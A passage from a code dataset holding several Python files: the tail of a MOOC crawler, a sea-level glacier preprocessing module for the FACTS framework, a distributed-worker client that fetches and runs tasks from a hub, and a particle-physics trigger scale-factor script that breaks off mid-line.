re.I)\r\nvideolisturl = match_videolisturl.group(1)\r\n\r\nvideoboard = s.get(mooc_course + videolisturl)\r\nvideosoup = BeautifulSoup(videoboard.text, \"html.parser\")\r\ncurrentvideo = mooc_course + re.match(r'.*',\r\n\t\t\t\t\t\tstr(videosoup.find(\"section\", id=\"course-content\").find(\"a\")), \r\n\t\t\t\t\t\tre.M | re.I).group(1)\r\n#currentvideo_info = {'event_type' 
: 'play_video', 'page' : currentvideo, 'event' : }","sub_path":"webcrawler/mooc.py","file_name":"mooc.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"345550743","text":"# GMSLR projection program used for IPCC WG1 AR5\n# Translated from IDL to Python 2.7 by Jonathan Gregory 23.10.19\n# Adapted for use in FACTS by Gregory Garner 20 November 2019\n\nimport os\nimport argparse\nimport pickle\nimport fnmatch\nimport re\nfrom netCDF4 import Dataset\nfrom import_data import *\nfrom filter_data import filter_data\nfrom Smooth import Smooth\nimport numpy as np\n\n\n\nclass ProjectionError(Exception):\n\tpass\n\t\n\t\n\t\ndef endofhistory():\n\treturn 2014\n\t\n\n\ndef tas_limit_filter(tasdict, temp_target, temp_target_window=0.25, ref_syear=1850, ref_eyear=1900):\n\t\n\t# Initialize a running list of models and scenarios to include in the analysis\n\tout_dict = {}\n\t\n\t# Determine which indices are in our reference average window\n\tref_idx = np.flatnonzero(np.logical_and(tasdict[\"years\"] >= ref_syear, tasdict[\"years\"] <= ref_eyear))\n\t\n\t# Extract the temperature data from the reference period and produce the average\n\tref_tas = np.mean(tasdict['data'][:,ref_idx], axis=1)\n\t\n\t# Smooth the temperature data over the 19 year window\n\ttas_smoothed = np.apply_along_axis(Smooth, axis=1, arr=tasdict[\"data\"], w=19)\n\t\n\t# Find the tas value to test for the temperature target\n\ttas_test = tas_smoothed[:,-1]\n\t#tas_test = np.nanmax(tas_smoothed, axis=1)\n\n\t# Get the indices where the 2100 temperature falls within the temperature limit window\n\tmatch_idx = np.flatnonzero(np.logical_and(tas_test >= temp_target - temp_target_window, tas_test <= temp_target + temp_target_window))\n\t\n\t# Subset the original tasdict for the matched indices\n\tout_dict[\"ensemble\"] = tasdict[\"ensemble\"][match_idx]\n\tout_dict[\"GCM\"] = tasdict[\"GCM\"][match_idx]\n\tout_dict[\"scenario\"] = tasdict[\"scenario\"][match_idx]\n\tout_dict[\"years\"] = tasdict[\"years\"]\n\tout_dict[\"data\"] = tasdict[\"data\"][match_idx,:]\n\n\t# Return the output dictionary\n\treturn(out_dict)\n\n\n\n\ndef ar5_preprocess_glaciersfair(scenario, startyr, pipeline_id):\n\t\n\t# Define the temperature input file name\n\tinfilename = \"CLIMATE_FORCING_1850.csv\"\n\tinfile = os.path.join(os.path.dirname(__file__), infilename)\n\t\n\t# Acceptable SSP scenarios\n\tssp_scenarios = ['ssp585', 'ssp370', 'ssp245', 'ssp126', 'ssp119']\n\t\n\t# Import the temperature data\n\ttemp_data = import_data(infile)\n\t\n\t# Test the provided scenario\n\tscenario_test = re.search(\"^tlim(\\d*\\.?\\d+)win(\\d*\\.?\\d+)$\", scenario)\n\tif(scenario_test):\n\t\t\n\t\t# This is a temperature limit, so extract the limit from the scenario string\n\t\ttemp_target = float(scenario_test.group(1))\n\t\ttemp_target_window = float(scenario_test.group(2))\n\t\t\n\t\t# Produce a list of models and scenarios that match the criteria\n\t\ttemp_data_filtered = tas_limit_filter(temp_data, temp_target, temp_target_window)\n\t\t\n\telif(scenario in ssp_scenarios):\n\t\t\n\t\t# Filter the temperature data for this particular scenario\n\t\ttemp_data_filtered = filter_data(temp_data, ensemble=\"FAIR\", scenario=scenario.upper())\n\t\n\telse:\n\t\t\n\t\t# This is an invalid scenario\n\t\traise Exception(\"Invalid scenario definition: {}\".format(scenario))\n\t\n\t# The module is calibrated to use the temperature reference period for AR5, so center\n\t# the temperature 
data to the mean of that period\n\tref_idx = np.flatnonzero(np.logical_and(temp_data_filtered[\"years\"] >= 1986, temp_data_filtered[\"years\"] <= 2005))\n\tref_tas = np.nanmean(temp_data_filtered[\"data\"][:,ref_idx], axis=1)\n\ttemp_data_filtered[\"data\"] = temp_data_filtered[\"data\"] - ref_tas[:,np.newaxis]\n\t\n\t# Find the mean and sd of the matched models/scenarios\n\ttemp_mean = np.nanmean(temp_data_filtered['data'], axis=0)\n\ttemp_sd = np.nanstd(temp_data_filtered['data'], axis=0)\n\tdata_years = temp_data_filtered['years']\n\t\n\t# Find which year in the data years is the start year\n\tbaseyear_idx = np.flatnonzero(data_years == startyr)\n\n\t# Integrate temperature to obtain K yr at ends of calendar years\n\t# Note - The original code I believe performs a cumulative sum of the standard\n\t# deviations, which is not correct. Below I provide a fix to that bug as well as\n\t# a replication of the bug for diagnostic purposes.\n\tinttemp_mean = np.cumsum(temp_mean)\n\t#inttemp_sd = np.sqrt(np.cumsum(temp_sd**2)) # Assume independence across models\n\tinttemp_sd = np.cumsum(temp_sd) # Assume correlation\n\t\n\t# Integrated quantities must be centered on the baseline year\n\tinttemp_mean -= inttemp_mean[baseyear_idx]\n\tinttemp_sd -= inttemp_sd[baseyear_idx]\n\t\t\n\t# Store preprocessed data in pickles\n\toutput = {'temp_mean': temp_mean, 'temp_sd': temp_sd, 'inttemp_mean': inttemp_mean, \\\n\t\t\t\t'inttemp_sd': inttemp_sd, 'data_years': data_years, 'startyr': startyr, \\\n\t\t\t\t'scenario': scenario}\n\t\n\t# Write the configuration to a file\n\toutdir = os.path.dirname(__file__)\n\toutfile = open(os.path.join(outdir, \"{}_data.pkl\".format(pipeline_id)), 'wb')\n\tpickle.dump(output, outfile)\n\toutfile.close()\n\n\treturn(0)\n\n\n\ndef ar5_preprocess_glaciersfair_full(scenario, startyr, pipeline_id):\n\t\n\t# Acceptable SSP scenarios\n\tssp_scenarios = ['ssp585', 'ssp370', 'ssp245', 'ssp126', 'ssp119']\n\t\n\t# Test the provided scenario\n\tscenario_test = re.search(\"^tlim(\\d*\\.?\\d+)win(\\d*\\.?\\d+)$\", scenario)\n\tif(scenario_test):\n\t\t\n\t\t# THIS SCENARIO HAS NOT BEEN IMPLEMENTED YET\n\t\traise Exception(\"Scenario \\\"{}\\\" has not been implemented yet\".format(scenario))\n\t\t\n\t\t# This is a temperature limit, so extract the limit from the scenario string\n\t\ttemp_target = float(scenario_test.group(1))\n\t\ttemp_target_window = float(scenario_test.group(2))\n\t\t\n\t\t# Produce a list of models and scenarios that match the criteria\n\t\ttemp_data_filtered = tas_limit_filter(temp_data, temp_target, temp_target_window)\n\t\t\n\telif(scenario in ssp_scenarios):\n\t\t\n\t\t# Define the temperature input file name\n\t\tinfilename = \"FAIR_{}.nc\".format(scenario)\n\t\tinfile = os.path.join(os.path.dirname(__file__), infilename)\n\t\t\n\t\t# Load the data set for this scenario\n\t\tnc = Dataset(infile, 'r')\n\t\ttemp_years = nc.variables['years'][:]\n\t\ttemp_data = nc.variables['gmst'][:,:]\n\t\tnc.close()\n\t\t\n\t\t# Filter the temperature data for this particular scenario\n\t\ttemp_data_filtered = {\"years\": temp_years, \"data\": temp_data.T}\n\t\n\telse:\n\t\t\n\t\t# This is an invalid scenario\n\t\traise Exception(\"Invalid scenario definition: {}\".format(scenario))\n\t\n\t# The module is calibrated to use the temperature reference period for AR5, so center\n\t# the temperature data to the mean of that period\n\tref_idx = np.flatnonzero(np.logical_and(temp_data_filtered[\"years\"] >= 1986, temp_data_filtered[\"years\"] <= 2005))\n\tref_tas = 
np.nanmean(temp_data_filtered[\"data\"][:,ref_idx], axis=1)\n\ttemp_data_filtered[\"data\"] = temp_data_filtered[\"data\"] - ref_tas[:,np.newaxis]\n\t\n\t# Find the mean and sd of the matched models/scenarios\n\ttemp_mean = np.nanmean(temp_data_filtered['data'], axis=0)\n\ttemp_sd = np.nanstd(temp_data_filtered['data'], axis=0)\n\tdata_years = temp_data_filtered['years']\n\t\n\t# Find which year in the data years is the start year\n\tbaseyear_idx = np.flatnonzero(data_years == startyr)\n\n\t# Integrate temperature to obtain K yr at ends of calendar years\n\t# Note - The original code I believe performs a cumulative sum of the standard\n\t# deviations, which is not correct. Below I provide a fix to that bug as well as\n\t# a replication of the bug for diagnostic purposes.\n\tinttemp_mean = np.cumsum(temp_mean)\n\t#inttemp_sd = np.sqrt(np.cumsum(temp_sd**2)) # Assume independence across models\n\tinttemp_sd = np.cumsum(temp_sd) # Assume correlation\n\t\n\t# Integrated quantities must be centered on the baseline year\n\tinttemp_mean -= inttemp_mean[baseyear_idx]\n\tinttemp_sd -= inttemp_sd[baseyear_idx]\n\t\t\n\t# Store preprocessed data in pickles\n\toutput = {'temp_mean': temp_mean, 'temp_sd': temp_sd, 'inttemp_mean': inttemp_mean, \\\n\t\t\t\t'inttemp_sd': inttemp_sd, 'data_years': data_years, 'startyr': startyr, \\\n\t\t\t\t'scenario': scenario}\n\t\n\t# Write the configuration to a file\n\toutdir = os.path.dirname(__file__)\n\toutfile = open(os.path.join(outdir, \"{}_data.pkl\".format(pipeline_id)), 'wb')\n\tpickle.dump(output, outfile)\n\toutfile.close()\n\n\treturn(0)\n\n\n\nif __name__ == '__main__':\n\t\n\t# Initialize the command-line argument parser\n\tparser = argparse.ArgumentParser(description=\"Run the glaciers pre-processing stage for the AR5 Global SLR projection workflow\",\\\n\tepilog=\"Note: This is meant to be run as part of the Framework for the Assessment of Changes To Sea-level (FACTS)\")\n\t\n\t# Define the command line arguments to be expected\n\tparser.add_argument('--scenario', help=\"SSP scenario (i.e. ssp585) or temperature target (i.e. 
tlim2.0win0.25)\", default='ssp585')\n\tparser.add_argument('--pipeline_id', help=\"Unique identifier for this instance of the module\")\n\tparser.add_argument('--startyear', help=\"Year from which to start integrating temperature [default=2005]\", type=int, default=2005)\n\tparser.add_argument('--fullFAIR', help=\"Run the full set of FAIR temperature trajectories [default=1, use full set] [0, use 500 member subset]\", type=int, choices=[0,1], default=1)\n\t\n\t# Parse the arguments\n\targs = parser.parse_args()\n\t\n\t# Run the preprocessing stage with the provided arguments\n\tif(args.fullFAIR == 1):\n\t\tar5_preprocess_glaciersfair_full(args.scenario, args.startyear, args.pipeline_id)\n\telse:\n\t\tar5_preprocess_glaciersfair(args.scenario, args.startyear, args.pipeline_id)\n\t\n\texit()","sub_path":"modules/ar5/glaciersfair/ar5_preprocess_glaciersfair.py","file_name":"ar5_preprocess_glaciersfair.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"357863922","text":"import socket\nimport json\n\nimport Brick\nimport Worker\n\nwaitfor = None\n\ndef Parse(conn, message):\n\tglobal waitfor\n\n\tif Brick.DEBUG and message:\n\t\tprint(\"\\033[0;36mrecv\\033[0m> \\033[0;33m%s\\033[0m\" % (message))\n\n\t\"\"\"General problems\"\"\"\n\tif message == 'access denied':\n\t\tprint(\"\\033[1;31mAccess denied.\\033[0m\")\n\t\treturn None\n\telif message == 'request invalid':\n\t\tprint(\"\\033[1;33mInvalid request.\\033[0m\")\n\t\treturn None\n\telif message == 'no actions':\n\t\tprint(\"\\033[1;33mNo actions.\\033[0m\")\n\t\treturn None\n\telif message == 'False' or message == 'True' or message == 'None':\n\t\treturn None\n\n\tif not message:\n\t\t\"\"\"Authorize after fresh connection\"\"\"\n\t\twaitfor = 'auth_response'\n\t\treturn \"auth slave %s imslave!\" % (socket.gethostname())\n\n\telse:\n\t\tif waitfor == 'auth_response':\n\t\t\tdata = message.split(' ')\n\n\t\t\twaitfor = None\n\t\t\tif data[0] == 'ok':\n\t\t\t\tprint(\"Connected to \\033[0;36m%s\\033[0m \\033[0;33m%s\\033[0m at %s:%s\" % (data[1], data[2], Brick.TCP_IP, Brick.TCP_PORT))\n\t\t\t\treturn 'task get'\n\t\t\telif message == 'fail':\n\t\t\t\tprint(\"\\033[1;33mAuthorization failed!\\033[0m\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\t\"\"\"We're not waiting for something specific?\"\"\"\n\t\t\t\"\"\"Assume it's json going from Hub\"\"\"\n\n\t\t\tdata = json.loads(message)\n\t\t\tif 'tasklist' in data:\n\t\t\t\tif Worker.isFree():\n\t\t\t\t\treturn 'task get'\n\t\t\t\telse:\n\t\t\t\t\treturn 'fail'\n\t\t\telif 'task' in data:\n\t\t\t\tprint(\"Starting task \\033[0;36m%s\\033[0m\" % data['task']['name'])\n\t\t\t\tconn.send('task started\\n')\n\t\t\t\tret = Worker.start_task(conn, data['task']['cmd'])\n\n\treturn None\n","sub_path":"slave/Request.py","file_name":"Request.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"297792564","text":"from __future__ import print_function, division\nimport gzip\nimport json\nimport os\n\nimport uproot\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom coffea import hist\nfrom coffea.util import load, save\n\nimport pickle\nimport gzip\nimport math\n\nimport argparse\n#import processmap\n#from hists_map import *\n\nplt.rcParams.update({\n 'font.size': 14,\n 'axes.titlesize': 18,\n 'axes.labelsize': 18,\n 'xtick.labelsize': 12,\n 'ytick.labelsize': 12,\n 'text.usetex': False,\n })\n\nfill_opts 
= {\n 'edgecolor': (0,0,0,0.3),\n 'alpha': 0.8\n }\nerr_opts = {\n #'linestyle':'-',\n 'marker': '.',\n 'markersize': 10.,\n 'color':'k',\n 'elinewidth': 1,\n 'emarker': '-'\n }\n\nchanlist = [\"hadhad\", \"hadel\", \"hadmu\"]\nhistnames = {\n 'hadhad': \"trigeff_m\",\n 'hadel': \"trigeff_m\",\n 'hadmu': \"trigeff_m\",\n}\nvarcuts_data = {\n \"hadhad\": {\"region\": \"hadhad_signal_0\", \"trig_pass_ref\": [0.5, 1.5]},\n \"hadel\": {\"region\": \"hadel_signal_0\", \"trig_pass_ref\": [0.5, 1.5], \"jet_msd\": [40.,None]},\n \"hadmu\": {\"region\": \"hadmu_signal_0\", \"trig_pass_ref\": [0.5, 1.5], \"jet_msd\": [40.,None]},\n}\nvarcuts_mc = {\n \"hadhad\": {\"region\": \"hadhad_signal_0\", \"trig_pass_ref\": [0.5, 1.5]},\n \"hadel\": {\"region\": \"hadel_signal_0\", \"trig_pass_ref\": [0.5, 1.5], \"jet_msd\": [40.,None]},\n \"hadmu\": {\"region\": \"hadmu_signal_0\", \"trig_pass_ref\": [0.5, 1.5], \"jet_msd\": [40.,None]},\n}\nvar1names = {\n \"hadhad\": \"jet_pt\",\n \"hadel\": \"jet_pt\",\n \"hadmu\": \"jet_pt\",\n}\nvar1labels = {\n \"hadhad\": \"$p_{T}(jet)$\",\n \"hadel\": \"$p_{T}(jet)$\",\n \"hadmu\": \"$p_{T}(jet)$\",\n}\nrebin1 = {\n \"hadhad\": [200.,250.,300.,350.,400.,450.,500.,550.,600.,650.,950.],\n \"hadel\": [200.,250.,300.,350.,400.,500.,950.],\n \"hadmu\": [200.,250.,300.,350.,400.,500.,950.],\n}\nvar2names = {\n \"hadhad\": \"jet_msd\",\n \"hadel\": \"lep_pt\",\n \"hadmu\": \"lep_pt\",\n}\nvar2labels = {\n \"hadhad\": \"$m_{SD}(jet)$\",\n \"hadel\": \"$p_{T}(e)$\",\n \"hadmu\": \"$p_{T}(\\mu)$\",\n}\nrebin2 = {\n \"hadhad\": [0.,10.,20.,30.,40.,50.,60.,70.,80.,90.,100.],\n \"hadel\": [20.,32.,44.,56.,68.,92.,116.,140.],\n \"hadmu\": [20.,32.,44.,56.,68.,92.,116.,140.],\n}\nnumsels = {\n \"hadhad\": {\"trig_pass\": [0.5, 1.5]},\n \"hadel\": {\"trig_pass\": [0.5, 1.5]},\n \"hadmu\": {\"trig_pass\": [0.5, 1.5]},\n}\n\n#overflow_behavior = 'all'\noverflow_behavior = 'over'\n\ndef getTrigEff(h,var1_name,var2_name,vars_cut,num_sel,rebins1,rebins2):\n#def drawTrigEff(h,var1_name,var1_label,var2_name,var2_label,vars_cut,num_sel,plot_title,plot_label):\n print(h)\n #print(h.values())\n exceptions = [var1_name,var2_name,'dataset']\n for var,val in vars_cut.items():\n exceptions.append(var)\n for var,val in num_sel.items():\n exceptions.append(var)\n print(exceptions)\n x = h.sum(*[ax for ax in h.axes() if ax.name not in exceptions],overflow='all')\n if var1_name in num_sel.keys() or var2_name in num_sel.keys():\n print(\"%s and %s cannot be a variable in numerator selection\"%(var1_name,var2_name))\n return\n for var,val in vars_cut.items():\n if var!=var1_name and var!=var2_name:\n print('integrating ',var,val[0],val[1])\n if (len(val)==2):\n x = x.integrate(var,slice(val[0],val[1]))#,overflow=overflow_behavior)\n elif(type(val) is str):\n x = x.integrate(var,val)#,overflow=overflow_behavior)\n elif(len(val)==1):\n x = x.integrate(var,val[0])#,overflow=overflow_behavior)\n x_num = x.copy()\n #x_num = x_num.sum(*[ax for ax in x_num.axes() if ax.name in num_sel],overflow='all') #same axes as numerator\n #x_num.clear()\n\n xlist = []\n for var,val in num_sel.items():\n if var!=var1_name and var!=var2_name:\n print('integrating ',var,val)\n print(var,val)\n if (len(val)==2):\n #xlist.append(x.integrate(var,slice(val[0],val[1])))#,overflow=overflow_behavior))\n x_num = x_num.integrate(var,slice(val[0],val[1]))#,overflow=overflow_behavior))\n elif(len(val)==1):\n #xlist.append(x.integrate(var,val[0]))#,overflow=overflow_behavior))\n x_num = 
x_num.integrate(var,val[0])#,overflow=overflow_behavior))\n #for xadd in xlist:\n # x_num.add(xadd)\n x = x.sum(*[ax for ax in x.axes() if ax.name in num_sel],overflow='none')\n\n #print(x.values())\n #print(x_num.values())\n\n x = x.sum(*[\"dataset\"],overflow='allnan')\n x_num = x_num.sum(*[\"dataset\"],overflow='allnan')\n\n #x = x.rebin(var1_name, hist.Bin(var1_name+\"_new\", var1_name+\"_new\", rebins1))\n #x = x.rebin(var2_name, hist.Bin(var2_name+\"_new\", var2_name+\"_new\", rebins2))\n #x_num = x_num.rebin(var1_name, hist.Bin(var1_name+\"_new\", var1_name+\"_new\", rebins1))\n #x_num = x_num.rebin(var2_name, hist.Bin(var2_name+\"_new\", var2_name+\"_new\", rebins2))\n x = x.rebin(var1_name, hist.Bin(var1_name, var1_name, rebins1))\n x = x.rebin(var2_name, hist.Bin(var2_name, var2_name, rebins2))\n x_num = x_num.rebin(var1_name, hist.Bin(var1_name, var1_name, rebins1))\n x_num = x_num.rebin(var2_name, hist.Bin(var2_name, var2_name, rebins2))\n\n x_bins = x.axis(var1_name).edges()\n y_bins = x.axis(var2_name).edges()\n\n den_arr = np.array(x.values(overflow='all')[()])\n num_arr = np.array(x_num.values(overflow='all')[()])\n\n if ([ax.name for ax in x.axes()][0]==var1_name):\n den_arr = np.transpose(den_arr)\n num_arr = np.transpose(num_arr)\n\n den_arr[:][1] = den_arr[:][1] + den_arr[:][0]\n den_arr[:][-2] = den_arr[:][-2] + den_arr[:][-1]\n num_arr[:][1] = num_arr[:][1] + num_arr[:][0]\n num_arr[:][-2] = num_arr[:][-2] + num_arr[:][-1]\n\n den_arr[1][:] = den_arr[1][:] + den_arr[0][:]\n den_arr[-2][:] = den_arr[-2][:] + den_arr[-1][:]\n num_arr[1][:] = num_arr[1][:] + num_arr[0][:]\n num_arr[-2][:] = num_arr[-2][:] + num_arr[-1][:]\n\n den_arr = np.delete(den_arr,-1,0)\n den_arr = np.delete(den_arr,0,0)\n den_arr = np.delete(den_arr,-1,1)\n den_arr = np.delete(den_arr,0,1)\n num_arr = np.delete(num_arr,-1,0)\n num_arr = np.delete(num_arr,0,0)\n num_arr = np.delete(num_arr,-1,1)\n num_arr = np.delete(num_arr,0,1)\n\n print(num_arr)\n print(den_arr)\n print(x_bins)\n print(y_bins)\n\n eff_range_arr = hist.clopper_pearson_interval(num_arr, den_arr)\n\n return np.transpose(np.divide(num_arr,den_arr, out=np.zeros_like(num_arr), where=den_arr!=0)),x_bins,y_bins,np.transpose(eff_range_arr,[0,2,1])\n\ndef getHists(filename_data,filename_mc,hadel_w,hadmu_w,hadhad_w):\n\n eff_hists_data = {}\n eff_hists_mc = {}\n eff_hists_data_int = {}\n eff_hists_mc_int = {}\n x_bins = {}\n y_bins = {}\n chan_w = {'hadhad':hadhad_w,'hadel':hadel_w,'hadmu':hadmu_w}\n\n for chan in chanlist:\n h_trig = None\n for f_d in filename_data:\n # open hists\n hists_unmapped_data = load('%s.coffea'%f_d)\n \n # map to hists\n for key in hists_unmapped_data:\n if (key==histnames[chan]):\n if not h_trig:\n h_trig = hists_unmapped_data[key]\n else:\n h_trig = h_trig + hists_unmapped_data[key]\n \n print(f_d)\n eff_hists_data[chan],_,_,eff_hists_data_int[chan] = getTrigEff(h_trig,var1names[chan],var2names[chan],varcuts_data[chan],numsels[chan],rebin1[chan],rebin2[chan])\n #drawTrigEff(h_trig,args.var1name,args.var1label,args.var2name,args.var2label,vars_cuts,num_sels,args.title,args.label)\n\n h_trig = None\n if (len(chan_w[chan]) != len(filename_mc)):\n chan_w[chan] = [1. 
for f in filename_mc]\n for i,f_m in enumerate(filename_mc):\n # open hists\n hists_unmapped_mc = load('%s.coffea'%f_m)\n\n # map to hists\n for key in hists_unmapped_mc:\n if (key==histnames[chan]):\n if (chan_w[chan][i] != 1.): \n hists_unmapped_mc[key].scale(chan_w[chan][i])\n if not h_trig:\n h_trig = hists_unmapped_mc[key]\n else:\n h_trig = h_trig + hists_unmapped_mc[key]\n \n print(f_m)\n eff_hists_mc[chan],x_bins[chan],y_bins[chan],eff_hists_mc_int[chan] = getTrigEff(h_trig,var1names[chan],var2names[chan],varcuts_mc[chan],numsels[chan],rebin1[chan],rebin2[chan])\n #drawTrigEff(h_trig,args.var1name,args.var1label,args.var2name,args.var2label,vars_cuts,num_sels,args.title,args.label)\n\n return eff_hists_data,eff_hists_mc,x_bins,y_bins,eff_hists_data_int,eff_hists_mc_int\n \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--hists_data', dest='hists_data', default=\"hists_data\", help=\"hists pickle name (data)\", nargs='+')\n parser.add_argument('--hists_mc', dest='hists_mc', default=\"hists_mc\", help=\"hists pickle name (MC)\", nargs='+')\n parser.add_argument('--hadel_w', dest='hadel_w', default=[1.], help=\"HadEl File Weights (MC)\", nargs='+', type=float)\n parser.add_argument('--hadmu_w', dest='hadmu_w', default=[1.], help=\"HadMu File Weights (MC)\", nargs='+', type=float)\n parser.add_argument('--hadhad_w', dest='hadhad_w', default=[1.], help=\"HadHad File Weights (MC)\", nargs='+', type=float)\n #parser.add_argument('--histname', dest='histname', default=\"trigeff\", help=\"hist name\")\n parser.add_argument('--tag', dest='tag', default=\"trig_sf_debug\", help=\"tag\")\n parser.add_argument('--output', dest='output', default=\"../boostedhiggs/data/trig_sf_corr\", help=\"output\")\n parser.add_argument('--year', dest='year', default=\"2017\", help=\"year\")\n #parser.add_argument('--varname', dest='varname', default=\"\", help=\"varname\")\n #parser.add_argument('--varlabel', dest='varlabel', default=\"\", help=\"varlabel\")\n #parser.add_argument('--varcuts', dest='varcuts', default=\"\", help=\"varcuts\", nargs='+')\n #parser.add_argument('--numsel', dest='numsel', default=\"\", help=\"numsel\", nargs='+')\n #parser.add_argument('--title', dest='title', default=\"\", help=\"title\")\n #parser.add_argument('--label', dest='label', default=\"\", help=\"label\")\n args = parser.parse_args()\n\n #python make_trig_eff.py --hists_data ../condor/May27_Trig/hists_trig_Run2017CDEF --hists_mc ../condor/May27_Trig/hists_trig_QCD\n\n eff_hists_data,eff_hists_mc,x_bins,y_bins,eff_hists_data_int,eff_hists_mc_int = getHists(args.hists_data,args.hists_mc,args.hadel_w,args.hadmu_w,args.hadhad_w)\n\n h_trig_sf = {}\n arr_sf = {}\n arr_sf_up = {}\n arr_sf_down = {}\n h_trig_eff_mc = {}\n h_trig_eff_data = {}\n for chan in chanlist:\n h_trig_sf[args.year+\"_trigsf_\"+chan+\"_nom\"] = hist.Hist(\"Trigger Scale Factor (%s) Nominal\"%chan,\n hist.Bin(var1names[chan], var1labels[chan], x_bins[chan]),\n hist.Bin(var2names[chan], var2labels[chan], y_bins[chan]),\n )\n h_trig_sf[args.year+\"_trigsf_\"+chan+\"_up\"] = hist.Hist(\"Trigger Scale Factor (%s) Up\"%chan,\n hist.Bin(var1names[chan], var1labels[chan], x_bins[chan]),\n hist.Bin(var2names[chan], var2labels[chan], y_bins[chan]),\n )\n h_trig_sf[args.year+\"_trigsf_\"+chan+\"_down\"] = hist.Hist(\"Trigger Scale Factor (%s) Down\"%chan,\n hist.Bin(var1names[chan], var1labels[chan], x_bins[chan]),\n hist.Bin(var2names[chan], var2labels[chan], y_bins[chan]),\n )\n h_trig_eff_mc[chan] = hist.Hist(\"Trigger 
Efficiency, MC (%s)\"%chan,\n hist.Bin(var1names[chan], var1labels[chan], x_bins[chan]),\n hist.Bin(var2names[chan], var2labels[chan], y_bins[chan]),\n )\n h_trig_eff_data[chan] = hist.Hist(\"Trigger Efficiency, Data (%s)\"%chan,\n hist.Bin(var1names[chan], var1labels[chan], x_bins[chan]),\n hist.Bin(var2names[chan], var2labels[chan], y_bins[chan]),\n )\n inputs = {}\n inputs_up = {}\n inputs_down = {}\n inputs_mc = {}\n inputs_data = {}\n inputs[var1names[chan]] = np.array([(x_bins[chan][ix]+x_bins[chan][ix+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs[var2names[chan]] = np.array([(y_bins[chan][iy]+y_bins[chan][iy+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_up[var1names[chan]] = np.array([(x_bins[chan][ix]+x_bins[chan][ix+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_up[var2names[chan]] = np.array([(y_bins[chan][iy]+y_bins[chan][iy+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_down[var1names[chan]] = np.array([(x_bins[chan][ix]+x_bins[chan][ix+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_down[var2names[chan]] = np.array([(y_bins[chan][iy]+y_bins[chan][iy+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_mc[var1names[chan]] = np.array([(x_bins[chan][ix]+x_bins[chan][ix+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_mc[var2names[chan]] = np.array([(y_bins[chan][iy]+y_bins[chan][iy+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_data[var1names[chan]] = np.array([(x_bins[chan][ix]+x_bins[chan][ix+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs_data[var2names[chan]] = np.array([(y_bins[chan][iy]+y_bins[chan][iy+1])/2. for ix in range(len(x_bins[chan])-1) for iy in range(len(y_bins[chan])-1)])\n inputs[\"weight\"] = np.divide(eff_hists_data[chan],eff_hists_mc[chan],out=np.ones_like(eff_hists_data[chan]), where=eff_hists_mc[chan]!=0.).flatten()\n inputs_up[\"weight\"] = np.divide(eff_hists_data_int[chan][1],eff_hists_mc_int[chan][0],out=np.ones_like(eff_hists_data_int[chan][1]), where=eff_hists_mc_int[chan][0]!=0.).flatten()\n inputs_down[\"weight\"] = np.divide(eff_hists_data_int[chan][0],eff_hists_mc_int[chan][1],out=np.ones_like(eff_hists_data_int[chan][0]), where=eff_hists_mc_int[chan][1]!=0.).flatten()\n arr_sf[chan] = inputs[\"weight\"]\n arr_sf_up[chan] = inputs_up[\"weight\"]\n arr_sf_down[chan] = inputs_down[\"weight\"]\n inputs_mc[\"weight\"] = eff_hists_mc[chan].flatten()\n inputs_data[\"weight\"] = eff_hists_data[chan].flatten()\n \n h_trig_sf[args.year+\"_trigsf_\"+chan+\"_nom\"].fill(**inputs)\n h_trig_sf[args.year+\"_trigsf_\"+chan+\"_up\"].fill(**inputs_up)\n h_trig_sf[args.year+\"_trigsf_\"+chan+\"_down\"].fill(**inputs_down)\n h_trig_eff_mc[chan].fill(**inputs_mc)\n h_trig_eff_data[chan].fill(**inputs_data)\n\n for chan in chanlist:\n fig,ax = plt.subplots(1,1, figsize=(8,8))\n hist.plot2d(h_trig_sf[args.year+\"_trigsf_\"+chan+\"_nom\"],\n ax=ax,\n clear=True,\n xaxis=var1names[chan],\n )\n for i in range(len(y_bins[chan])-1):\n for j in range(len(x_bins[chan])-1):\n ax.text((x_bins[chan][j]+x_bins[chan][j+1])/2.,(y_bins[chan][i]+y_bins[chan][i+1])/2., \"{:0.2f}\".format(np.reshape(arr_sf[chan],(len(x_bins[chan])-1,len(y_bins[chan])-1))[j,i]) if eff_hists_mc[chan][j,i]>0. 
